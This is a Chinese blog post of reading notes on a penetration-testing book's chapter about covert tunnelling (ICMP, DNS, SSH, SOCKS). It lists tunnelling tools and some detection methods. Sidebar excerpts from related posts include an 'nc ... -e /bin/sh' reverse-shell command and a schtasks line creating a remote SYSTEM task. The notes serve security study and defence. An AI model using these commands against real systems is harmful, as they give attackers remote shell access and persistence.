内网安全攻防(三)

最新推荐文章于 2024-05-07 18:21:29 发布
最新推荐文章于 2024-05-07 18:21:29 发布
阅读量577 收藏 5
点赞数 1
分类专栏: 读书笔记 # 内网安全攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YUKIDDDD/article/details/119357684
版权

第3章 隐藏通信隧道技术

3.1 基础知识

隧道是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原的后的数据包发送到响应的服务器上。

常用的隧道举例:

  • 网络层:IPv6,ICMP,GRE
  • 传输层:TCP,UDP,常规端口转发
  • 应用层:SSH,HTTP,HTTPS,DNS

判断内网连通性

  1. ICMP协议:ping <IP地址或域名>
  2. TCP协议:nc <IP地址 端口号>
  3. HTTP协议:curl <IP地址:端口号>
  4. DNS协议:nslookupdig

3.2 网络层隧道技术

一、IPv6隧道
1.简介

通过IPv4隧道传送IPv6隧道数据报文。将IPv6报文整体封装到IPv4数据报文中,使IPv6报文能够穿过IPv4还用,到达IPv6小岛。

  • 当前的边界设备、防火墙甚至入侵防御系统还无法识别IPv6的通信数据
  • 即使设备支持IPv6,也可能无法正确分析封装了IPv6报文的IPv4数据包
  • 只有在执行隧道功能的节点的IPv6地址是IPv4兼容地址时,自动隧道才是可行的
  • 配置隧道方法则要求隧道末端节点使用其他机制来获得IPv4地址
  • 常用工具:socat,6tunnel,nt6tunnel

2.防御方法
了解IPv6的具体漏洞,结合其他协议,通过防火墙或其他防御系统过滤IPv6通信。

二、ICMP隧道

一般通信协议下,两台设备要进行通信,就需要开放端口,而ICMP协议则不需要。
将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙

常用工具

  • icmpsh
  • PingTunnel
  • icmptunnel
  • powershell icmp

防御方法

  • 检查同一来源的ICMP数据包的数量
  • 注意Payload大于64bit的ICMP数据包
  • 寻找响应数据包中的Payload与请求数据包中的Payload不一致的ICMP数据包
  • 检查ICMP数据包的协议标签

3.3 传输层隧道技术

一、端口转发

  • 内网端口转发
  • 本地端口映射

二、常用工具

  • lcx
  • netcat
  • PowerCat

3.4 应用层隧道技术

一、SSH协议

  • 本地转发
  • 远程转发
  • 动态转发

二、HTTP/HTTPS协议
三、DNS协议

  • 查看DNS连通性
  • dnscat2
  • iodine

3.5 SOCKS代理

SOCKS是一种代理服务,可以简单的将一端连接另一端。其标准端口为1080,SOCKS能够与目标内网计算机进行通信,避免多次使用端口转发
它在服务端监听一个端口,当有新的连接请求出现时,会先从SOCKS协议中解析出URL的目标端口,再执行lcx的具体功能

常用工具

  • EarthWorm
  • reGeorg
  • sSocks
  • Sockscap64
  • Proxifier
  • proxyChains

3.6 压缩数据

  • RAR
  • 7-Zip

3.7 上传和下载

  • FTP
  • VBS
  • Debug
  • Nishang
  • bitsadmin
  • PowserShell
YUKIDDDD
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《内安全攻防:渗透测试实战指南》读书笔记(二):内信息收集
闵行小鱼塘
04-08 1790
本篇继续阅读学习《内安全攻防:渗透测试实战指南》,是第二章内信息收集,主要介绍了当前主机信息搜集、域内存活主机探测、域内端口扫描、域内用户和管理员权限的获取、如何获取域内段划分信息和拓扑架构分析等,并介绍了域分析工具BloodHound的使用(本篇笔记没记该工具)
安全攻防(四)
YUKIDDDD的博客
08-04 537
第四章 权限提升分析及防御4.1 系统内核溢出漏洞提权分析及防范4.2 Windows操作系统配置错误4.3 组策略首选项提权分析及防范4.4 绕过UAC提权分析及防范4.5 令牌窃取分析及防范4.6 无凭证条件下的权限获取分析及防范 windows中权限大概分为四种: User:普通用户权限 Administrator:管理员权限(可利用Windows机制将自己提升为System权限) System:系统权限,可以对SAM等敏感文件进行读取 TrustedInstaller:Windows中的最高权限,
安全攻防:渗透测试实战指南之内信息搜集_内安全攻防 渗透测试实战指南 pdf百度盘下载
最新发布
2401_84562858的博客
05-07 336
络配置信息、操作系统及软件的信息、本机服务信息、进程列表、启动程序信息、计划任务、主机开机时间、用户列表、连接会话、端口列表、补丁列表、本机共享列表、路由表和Arp缓存表、防火墙相关配置、代理配置情况、远程连接服务等。WMIC在信息搜集he后渗透测试阶段是非常实用的,可以调取和查看目标机器的进程、服务、用户、用户组、络连接、硬盘信息、络共享信息、已安装的补丁、启动项、已安装的软件、操作系统的相关信息、时区等。在本质上,**机器的system用户对应的就是域里面的机器用户。,360也会弹窗,可以尝试。
-内安全攻防-笔记.pdf
09-18
-内安全攻防-笔记.pdf
《内安全攻防:渗透测试实战指南》读书笔记(一):内渗透测试基础
闵行小鱼塘
04-07 4467
本篇开始阅读学习《内安全攻防:渗透测试实战指南》,做个笔记 本篇是第一章内渗透测试基础,基本都是些基础概念和环境搭建
《内安全攻防:渗透测试实战指南》之内渗透测试基础
公众号:乌云安全
12-21 2183
本章系统地讲解了内工作组、域、活动目录、域内权限解读等,并介绍了内域环境和渗透测试环境(Windows、Linux)的搭建方法和常用的渗透测试工具。
工控攻防演示-从外到内设备的入侵
曲终人散
08-06 2478
· 一、 概述 1. 实验目的 通过工控靶场学习web渗透、内渗透、工控安全相关知识技能。 2. 靶场信息 本实验通过vmware 搭建了靶场的外和内环境,在内环境中,可以连接到真实的PLC进行漏洞利用。 靶场络拓扑如下: 该络环境中,有两台攻击机处于模拟外中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘。 二、 演示过程 1. 资产发现 登录 kali 攻击机,输入 ifconfig 查
安全攻防渗透测试实战指南.pptx
07-01
安全攻防渗透测试实战指南 内安全攻防渗透测试实战指南是指在内中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内安全攻防的原理和方法。 内安全攻防渗透测试实战指南主要包含...
AHZY-内安全攻防2020-01-12 内安全攻防知识分享,
08-21
安全攻防安全领域中的重要组成部分,它涉及到企业、机构等组织内部络的保护,防止未经授权的访问、攻击和信息泄露。本篇知识分享主要讲解了如何利用SSH隧道进行内安全穿越,即内安全攻防中的端口...
AHZY-内安全攻防2020-01-12 内安全攻防知识分享,
08-20
安全攻防安全领域中的重要组成部分,尤其是在企业或组织内部,内安全性直接影响到数据保护和业务运行的稳定性。以下是一些内安全攻防的基本知识点和技巧: 1. **信息搜集**:在进行内安全防护...
攻防之内安全横向渗透权限提升
weixin_46626737的博客
06-30 694
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
渗透攻击线路图.pdf
03-21
渗透攻击线路图.pdf
渗透测试技术
09-13
渗透技术,请勿用于非法目的,仅用于技术交流。
ARP投毒攻击.PDF
06-21
该文档为ARP投毒攻击的原理步骤以及防御对策的概括性总结
渗透测试-内客户端渗透.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
ARP攻防教程
10-03
超详细讲解ARP攻防 首次上传文件 希望大家捧场 积分并不是太高
攻防学习Day1——常见的内结构
dzqxwzoe的博客
08-19 178
在实际的渗透测试过程中,面对复杂多变的络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。而实际上,因为域中的计算机是使用DNS来定位域控制器、服务器及其他计算机、络服务的,所以域的名字就是DNS域的名字。每个域中都有独立的安全策略。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。
《内安全攻防:渗透测试实战指南》之内渗透测试基础_域渗透攻防指南pdf
2401_84435059的博客
04-17 914
DC中存在由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。安全域划分的目的是将一组安全等级相同的计算机划入同一个段内, 在络边界上通过防火墙来实现对其他安全域的NACL(络访问控制策略), 使得其风险最小化。本章系统地讲解了内工作组、域、活动目录、域内权限解读等,并介绍了内域环境和渗透测试环境(Windows、Linux)的搭建方法和常用的渗透测试工具。可以简单的把域理解成升级版的工作组,但有一个严格的集中管理控制机制。DC的本质是一台计算机,AD的本质是提供目录服务的组件。
局域安全攻防
wanger5354的博客
12-14 4909
微信公众号:运维开发故事,作者:wanger mac泛洪攻击与防护 mac学习机制 在最初的时候,交换机里是没有mac地址表信息的,那么交换机就要进行学习,假如交换机上连接着两个主机PC1和PC2,当PC1要与PC2进行通信时,PC1的数据帧流入交换机,交换机会把PC1的MAC地址和PC1连接的端口记录到交换机的mac表中,但是交换机的mac地址表中并没有PC2的mac地址信息和端口绑定,所以交换机会将数据帧向全发送广播,当主机收到数据帧后会把目的mac地址和自己的进行比对,如果一样就应答,不一样就丢.
安全攻防:渗透测试实战指南 pdf下载
07-29
对于内安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试内安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: 1. 有合法的授权和使用权限吗? 渗透测试是一项敏感且潜在危险的活动,需要事先与相关当事人保持沟通和达成共识,以确保测试合法、合规和有授权。因此,在下载之前,我们要确保自己拥有相应的合法权限。 2. 评估所需工具和技能 渗透测试需要一定的技术和工具支持。在下载之前,我们需要评估自己是否具备进行渗透测试所需要的技能和经验,并确认自己是否具备所需的工具和环境。 3. 错误使用导致的后果 渗透测试是一项高风险活动,如果错误使用或者测试方法不当,可能导致严重的后果,如业务中断、数据泄露等。因此,在下载之前,我们需要认识到这一点,并确保自己具备相应的安全意识和责任心。 总之,下载内安全攻防和渗透测试实战指南的PDF之前,我们要确保自己拥有合法授权和权限,具备相应的技能和工具,以及清楚认识到错误使用可能导致的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值